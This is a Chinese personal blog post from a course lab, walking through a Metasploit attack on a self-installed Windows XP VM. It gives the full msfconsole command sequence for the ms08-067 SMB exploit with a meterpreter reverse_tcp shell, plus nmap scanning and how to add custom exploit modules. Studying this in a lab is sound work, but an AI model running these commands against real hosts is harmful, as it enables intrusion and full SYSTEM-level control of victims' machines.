<!DOCTYPE html>












  


<html class="theme-next pisces use-motion" lang="zh-CN">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge"/>
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2"/>
<meta name="theme-color" content="#222"/>
























  

<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/font-awesome/4.6.2/css/font-awesome.min.css"/>

<link rel="stylesheet" href="/css/main.css?v=7.1.1"/>




  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=7.1.1">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=7.1.1">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=7.1.1">


  <link rel="mask-icon" href="/images/logo.svg?v=7.1.1" color="#222">







<script id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '7.1.1',
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false,"dimmer":false},
    back2top: true,
    back2top_sidebar: false,
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="0x00 序课上体验了一把msf的一套流程，但是由于靶机已经上了补丁，所以失败了，这次来记录一下Metasploit的一套攻击流程，也不知道为啥，网上所有的入门也是拿课上的ms08-067 来测试的 那么我们这次来学习一下msf，并且能用msf用着ms08-067 来获取一个xp主机的cmd （还顺便学学怎么加入自己的exp  参考： Metasploit 官网 MSF - Github ：  m">
<meta property="og:type" content="article">
<meta property="og:title" content="Metasploit">
<meta property="og:url" content="http://magic-king.net/2020/05/21/Metasploit/index.html">
<meta property="og:site_name" content="Hexo&amp;Magic">
<meta property="og:description" content="0x00 序课上体验了一把msf的一套流程，但是由于靶机已经上了补丁，所以失败了，这次来记录一下Metasploit的一套攻击流程，也不知道为啥，网上所有的入门也是拿课上的ms08-067 来测试的 那么我们这次来学习一下msf，并且能用msf用着ms08-067 来获取一个xp主机的cmd （还顺便学学怎么加入自己的exp  参考： Metasploit 官网 MSF - Github ：  m">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://magic-king.net/2020/05/21/Metasploit/metasploit_version.png">
<meta property="og:image" content="http://magic-king.net/2020/05/21/Metasploit/msf.png">
<meta property="og:image" content="http://magic-king.net/2020/05/21/Metasploit/winxp_setting.png">
<meta property="og:image" content="http://magic-king.net/2020/05/21/Metasploit/namp_scan.png">
<meta property="og:image" content="http://magic-king.net/2020/05/21/Metasploit/msf_search.png">
<meta property="og:image" content="http://magic-king.net/2020/05/21/Metasploit/msf_payload.png">
<meta property="og:image" content="http://magic-king.net/2020/05/21/Metasploit/msf_payload2.png">
<meta property="og:image" content="http://magic-king.net/2020/05/21/Metasploit/msf_target.png">
<meta property="og:image" content="http://magic-king.net/2020/05/21/Metasploit/msf_option.png">
<meta property="og:image" content="http://magic-king.net/2020/05/21/Metasploit/msf_rhost.png">
<meta property="og:image" content="http://magic-king.net/2020/05/21/Metasploit/msf_lhost.png">
<meta property="og:image" content="http://magic-king.net/2020/05/21/Metasploit/msf_getshell.png">
<meta property="og:image" content="http://magic-king.net/2020/05/21/Metasploit/win_cmd.png">
<meta property="article:published_time" content="2020-05-21T11:47:40.000Z">
<meta property="article:modified_time" content="2020-05-22T07:28:44.265Z">
<meta property="article:author" content="Magic King">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://magic-king.net/2020/05/21/Metasploit/metasploit_version.png">


  


  <link rel="alternate" href="/atom.xml" title="Hexo&Magic" type="application/atom+xml"/>



  
  
  <link rel="canonical" href="http://magic-king.net/2020/05/21/Metasploit/"/>



<script id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>Metasploit | Hexo&Magic</title>
  












  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<meta name="generator" content="Hexo 4.2.0"></head>


<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Hexo&Magic</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br/>首页</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-about">

    
    
    
      
    

    

    <a href="/about/" rel="section"><i class="menu-item-icon fa fa-fw fa-user"></i> <br/>关于</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">

    
    
    
      
    

    

    <a href="/tags/" rel="section"><i class="menu-item-icon fa fa-fw fa-tags"></i> <br/>标签</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-categories">

    
    
    
      
    

    

    <a href="/categories/" rel="section"><i class="menu-item-icon fa fa-fw fa-th"></i> <br/>分类</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br/>归档</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-link">

    
    
    
      
    

    

    <a href="/Link/" rel="section"><i class="menu-item-icon fa fa-fw fa-magic"></i> <br/>Link</a>

  </li>

      
      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br/>搜索</a>
        </li>
      
    </ul>
  

  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://magic-king.net/2020/05/21/Metasploit/"/>

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Magic King"/>
      <meta itemprop="description" content="Now You See Me!"/>
      <meta itemprop="image" content="/images/avatar.jpg"/>
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hexo&Magic"/>
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Metasploit

              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              

              
                
              

              <time title="创建时间：2020-05-21 19:47:40" itemprop="dateCreated datePublished" datetime="2020-05-21T19:47:40+08:00">2020-05-21</time>
            

            
              

              
                
                <span class="post-meta-divider">|</span>
                

                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">更新于</span>
                
                <time title="修改时间：2020-05-22 15:28:44" itemprop="dateModified" datetime="2020-05-22T15:28:44+08:00">2020-05-22</time>
              
            
          </span>

          

          
            
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="post-meta-item-icon"
            >
            <i class="fa fa-eye"></i>
             阅读次数： 
            <span class="busuanzi-value" id="busuanzi_value_page_pv"></span>
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="0x00-序"><a href="#0x00-序" class="headerlink" title="0x00 序"></a>0x00 序</h2><p>课上体验了一把msf的一套流程，但是由于靶机已经上了补丁，所以失败了，这次来记录一下Metasploit的一套攻击流程，也不知道为啥，网上所有的入门也是拿课上的<code>ms08-067</code> 来测试的</p>
<p>那么我们这次来学习一下msf，并且能用msf用着<code>ms08-067</code> 来获取一个xp主机的<code>cmd</code></p>
<p>（还顺便学学怎么加入自己的exp</p>
<blockquote>
<p>参考：</p>
<p><a href="https://www.metasploit.com/" target="_blank" rel="noopener">Metasploit 官网</a></p>
<p><a href="https://github.com/rapid7/metasploit-framework" target="_blank" rel="noopener">MSF - Github</a> ：  msf的github仓库</p>
<p><a href="https://www.jianshu.com/p/23a6df0c12ab" target="_blank" rel="noopener">Metasploit入门系列(一)——何为MSF</a></p>
<blockquote>
<p><a href="https://www.jianshu.com/p/ccd62cb6d691" target="_blank" rel="noopener">Metasploit入门系列(二)——初识模块</a></p>
<p><a href="https://www.jianshu.com/p/2dec885bb3cf" target="_blank" rel="noopener">Metasploit入门系列(三)——基本命令</a></p>
<p><a href="https://www.jianshu.com/p/52196a3cdce2" target="_blank" rel="noopener">Metasploit入门系列(四)——小结备查</a></p>
<p><a href="https://www.jianshu.com/p/a94c247fe31d" target="_blank" rel="noopener">Metasploit入门系列(五)——frp</a></p>
<p><a href="https://www.jianshu.com/p/b6cc6ffa0695" target="_blank" rel="noopener">Metasploit入门系列(六)——永恒之蓝</a></p>
<p><a href="https://www.jianshu.com/p/412ce1fc7adc" target="_blank" rel="noopener">Metasploit入门系列(七)——Armitage</a></p>
<p><a href="https://www.jianshu.com/p/91a342fb664e" target="_blank" rel="noopener">Metasploit入门系列(八)——Meterpreter(一)</a></p>
<p><a href="https://www.jianshu.com/p/91588e284fe8" target="_blank" rel="noopener">Metasploit入门系列(九)——Meterpreter(二)</a></p>
<p><a href="https://www.jianshu.com/p/fcc665c91c94" target="_blank" rel="noopener">Metasploit入门系列(十)——Meterpreter(三)</a></p>
<p><a href="https://www.jianshu.com/p/c6e544f9ec99" target="_blank" rel="noopener">Metasploit入门系列(十一)——后渗透测试</a></p>
</blockquote>
<p><a href="https://blog.csdn.net/tan6600/article/details/46845793" target="_blank" rel="noopener">Metasploit 学习笔记</a> ： 模块介绍</p>
<p><a href="https://www.cnblogs.com/wangyuyang1016/p/11032201.html" target="_blank" rel="noopener">Meterpreter初探</a> ：Metasploit的一个扩展模块，在后渗透阶段有强大的攻击力</p>
<p><a href="https://xz.aliyun.com/t/2536" target="_blank" rel="noopener">后渗透之meterpreter使用攻略</a></p>
</blockquote>
<h2 id="0x01-介绍"><a href="#0x01-介绍" class="headerlink" title="0x01 介绍"></a>0x01 介绍</h2><p>Metasploit是一款开源的安全漏洞检测工具，到目前为止，msf已经内置了数千个 已披露的漏洞相关的模块和渗透测试工具，模块使用ruby语言编写，这使得使用者能够根据需要对模块进行适当修改，甚至是调用自己写的测试模块。选定需要使用的攻击模块之后，你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的 测试和利用，将渗透的过程自动化、简单化。</p>
<p>以下是Metasploit个版本的区别</p>
<p><img src="/2020/05/21/Metasploit/metasploit_version.png" alt></p>
<p>kali里面自带了Metasploit Framework，我们就直接拿来用了</p>
<h2 id="0x02-亲爱的ms08-067"><a href="#0x02-亲爱的ms08-067" class="headerlink" title="0x02 亲爱的ms08-067"></a>0x02 亲爱的ms08-067</h2><p>这是一次刺激的msf攻击流程，用的是kali2020.02的vmware版本（输入banner命令可以看到不同一些奇奇怪怪的东西）</p>
<p><img src="/2020/05/21/Metasploit/msf.png" alt></p>
<p>靶机是直接从msdn上刚下的winxp pro sp2，配置如下，内网地址为<code>192.168.52.135</code></p>
<p><img src="/2020/05/21/Metasploit/winxp_setting.png" alt></p>
<p>然后用kali的nmap扫一下靶机，发现啥都没扫出来，排查后发现是winxp的防火墙的原因，将其关掉，就发现该主机了</p>
<blockquote>
<p>当然，加入发现445端口还没开的话，需要对win xp进行配置一下</p>
<p>编辑注册表<code>HKEY_LOCAL_MACHINE=&gt;SYSTEM=&gt;CurrentControlSet=&gt;Services=&gt;NetBT=&gt;Parameters</code></p>
<p>在<code>Parameters</code>上右键新建<code>DWORD</code>值，数值为1，重命名为<code>SMBDeviceEnabled</code></p>
</blockquote>
<p><img src="/2020/05/21/Metasploit/namp_scan.png" alt></p>
<p>然后发现445端口开了之后就可以进行攻击了</p>
<p>在kali开启msf，先搜索一下这个漏洞，然后使用use</p>
<p><img src="/2020/05/21/Metasploit/msf_search.png" alt></p>
<p>然后去找相应的payload</p>
<p><img src="/2020/05/21/Metasploit/msf_payload.png" alt></p>
<p><img src="/2020/05/21/Metasploit/msf_payload2.png" alt></p>
<p>然后用set命令设置对应攻击载荷payload，这里使用的是<code>reverse_tcp</code>，这是一个基于TCP的反向链接反弹shell, 使用起来很稳定</p>
<p>然后用<code>show target</code> ，来查找该漏洞受影响的机器，并根据目标靶机设置该选项</p>
<p><img src="/2020/05/21/Metasploit/msf_target.png" alt></p>
<p>然后用<code>set target 10</code> 来设置目标靶机的版本</p>
<p>用<code>show options</code> 查看已经设置攻击模式</p>
<p><img src="/2020/05/21/Metasploit/msf_option.png" alt></p>
<p>然后设置目标靶机的ip地址，LHOST是攻击主机的地址</p>
<blockquote>
<p>当用户使用Metasploit框架中的模块时，经常需要配置LHOST参数。其中，LHOST参数用来指定本地主机IP地址。由于IP地址不容易记忆，而且输入也不方便。此时，用户可以使用接口名来代替，如set LHOST eth0。当用户指定接口名后，将自动使用eth0接口的IP地址。</p>
</blockquote>
<p><img src="/2020/05/21/Metasploit/msf_rhost.png" alt></p>
<p>这边注意，LHOST不要写本地回环的地址，否则会像我一样翻车的</p>
<p><img src="/2020/05/21/Metasploit/msf_lhost.png" alt></p>
<p>然后用exploit命令，成功getshell</p>
<p><img src="/2020/05/21/Metasploit/msf_getshell.png" alt></p>
<p>同时我们可以看到这边后台有一个system起的<code>cmd.exe</code>，即msf渗透得到的shell</p>
<p>简直可以为所欲为，不过试了下，windows这边还是可以终结掉kali的cmd进程</p>
<p>不过又有谁会发现进程里多了一个进程呢，还是system起的</p>
<p><img src="/2020/05/21/Metasploit/win_cmd.png" alt></p>
<p>后面的meterpreter模块真的是万能的好用</p>
<blockquote>
<p>具体命令参考：<a href="https://xz.aliyun.com/t/2536" target="_blank" rel="noopener">后渗透之meterpreter使用攻略</a></p>
</blockquote>
<p>一次完整的命令就如下了，虽然没有网上的博客直接打开一个shell，但是可以利用后渗透Meterpreter模块为所欲为，和getshell没啥大区别</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">search ms08-067</span><br><span class="line">use exploit/windows/smb/ms08_067_netapi</span><br><span class="line">show payloads</span><br><span class="line"><span class="built_in">set</span> payload windows/meterpreter/reverse_tcp</span><br><span class="line">show targets</span><br><span class="line"><span class="built_in">set</span> target 10</span><br><span class="line">show options</span><br><span class="line"><span class="built_in">set</span> RHOST 192.168.52.135 </span><br><span class="line"><span class="built_in">set</span> LHOST 192.168.52.133</span><br><span class="line">exploit</span><br></pre></td></tr></table></figure>



<h2 id="0x03-设置自己的exp"><a href="#0x03-设置自己的exp" class="headerlink" title="0x03 设置自己的exp"></a>0x03 设置自己的exp</h2><blockquote>
<p>参考：</p>
<p><a href="https://www.jianshu.com/p/6c7993ef7b4a" target="_blank" rel="noopener">Metasploit EXP开发</a></p>
<p><a href="https://netsec.ws/?p=262" target="_blank" rel="noopener">Converting Metasploit Module to Stand Alone</a> ： 其翻译版本<a href="https://blog.csdn.net/yalecaltech/article/details/89158575" target="_blank" rel="noopener">如何改写msf的module为独立的exp？</a></p>
<p><a href="https://blog.csdn.net/SilverMagic/article/details/40978081" target="_blank" rel="noopener">给kali的Metasploit下添加一个新的exploit</a></p>
</blockquote>
<p>这边先mark一下，万一以后用到了呢/doge</p>
<p>其exp是使用ruby语言编写的，可以仿照msf已有的exp进行编写，存放位置如下：<code>/usr/share/metasploit-framework/modules/exploits/fwdtest</code> </p>
<p>写完放到里面后，在msf下重新加载模块<code>msf &gt; reload_all</code>，在用<code>use xxx</code>命令能够自动补全时，说明成功添加</p>
<h2 id="0x04-常用命令链接"><a href="#0x04-常用命令链接" class="headerlink" title="0x04 常用命令链接"></a>0x04 常用命令链接</h2><p><a href="https://www.cnblogs.com/hijacklinux/p/7072854.html" target="_blank" rel="noopener">metasploit常用命令</a></p>
<p><a href="https://www.jianshu.com/p/7e630bbd294a" target="_blank" rel="noopener">msfconsole常用命令</a></p>
<p><a href="https://maplege.github.io/2017/09/16/meterpreterCommand/" target="_blank" rel="noopener">meterpreter常用命令+脚本</a></p>

      
    </div>

    

    
    
    

    

    
      
    
    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/05/15/Data-Backup/" rel="next" title="Data Backup">
                <i class="fa fa-chevron-left"></i> Data Backup
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/05/22/gdb-learning/" rel="prev" title="gdb-learning">
                gdb-learning <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/avatar.jpg"
                alt="Magic King"/>
            
              <p class="site-author-name" itemprop="name">Magic King</p>
              <div class="site-description motion-element" itemprop="description">Now You See Me!</div>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/%20%7C%7C%20archive">
                
                    <span class="site-state-item-count">60</span>
                    <span class="site-state-item-name">日志</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  
                    
                      <a href="/categories/%20%7C%7C%20th">
                    
                  
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">34</span>
                    <span class="site-state-item-name">分类</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-tags">
                  
                    
                      <a href="/tags/%20%7C%7C%20tags">
                    
                  
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">41</span>
                    <span class="site-state-item-name">标签</span>
                  </a>
                </div>
              
            </nav>
          

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
            <div class="links-of-author motion-element">
              
                <span class="links-of-author-item">
                  
                  
                    
                  
                  
                    
                  
                  <a href="https://github.com/Magic-King" title="GitHub &rarr; https://github.com/Magic-King" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i>GitHub</a>
                </span>
              
            </div>
          

          

          
          

          
            
          
          

        </div>
      </div>

      
      <!--noindex-->
        <div class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x00-序"><span class="nav-number">1.</span> <span class="nav-text">0x00 序</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-介绍"><span class="nav-number">2.</span> <span class="nav-text">0x01 介绍</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-亲爱的ms08-067"><span class="nav-number">3.</span> <span class="nav-text">0x02 亲爱的ms08-067</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x03-设置自己的exp"><span class="nav-number">4.</span> <span class="nav-text">0x03 设置自己的exp</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x04-常用命令链接"><span class="nav-number">5.</span> <span class="nav-text">0x04 常用命令链接</span></a></li></ol></div>
            

          </div>
        </div>
      <!--/noindex-->
      

      

    </div>
  </aside>
  


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; 2019 – <span itemprop="copyrightYear">2020</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Magic King</span>

  

  
</div>



  <div class="powered-by">由 <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v4.2.0 </div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> v7.1.1</div>




        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="post-meta-item-icon">
      <i class="fa fa-user"></i>
    </span>
    <span class="site-uv" title="总访客量">
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
    </span>
  

  
    <span class="post-meta-divider">|</span>
  

  
    <span class="post-meta-item-icon">
      <i class="fa fa-eye"></i>
    </span>
    <span class="site-pv" title="总访问量">
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
    </span>
  
</div>









        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
          <span id="scrollpercent"><span>0</span>%</span>
        
      </div>
    

    

    

    
  </div>

  

<script>
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>














  
    
    
      
    
  
  <script color='255,255,255' opacity='0.36' zIndex='-2' count='99' src="//cdn.jsdelivr.net/gh/theme-next/theme-next-canvas-nest@1/canvas-nest.min.js"></script>













  
  <script src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>


  


  <script src="/js/utils.js?v=7.1.1"></script>

  <script src="/js/motion.js?v=7.1.1"></script>



  
  


  <script src="/js/affix.js?v=7.1.1"></script>

  <script src="/js/schemes/pisces.js?v=7.1.1"></script>



  
  <script src="/js/scrollspy.js?v=7.1.1"></script>
<script src="/js/post-details.js?v=7.1.1"></script>



  


  <script src="/js/next-boot.js?v=7.1.1"></script>


  

  

  

  


  


  
  <script>
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url).replace(/\/{2,}/g, '/');
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
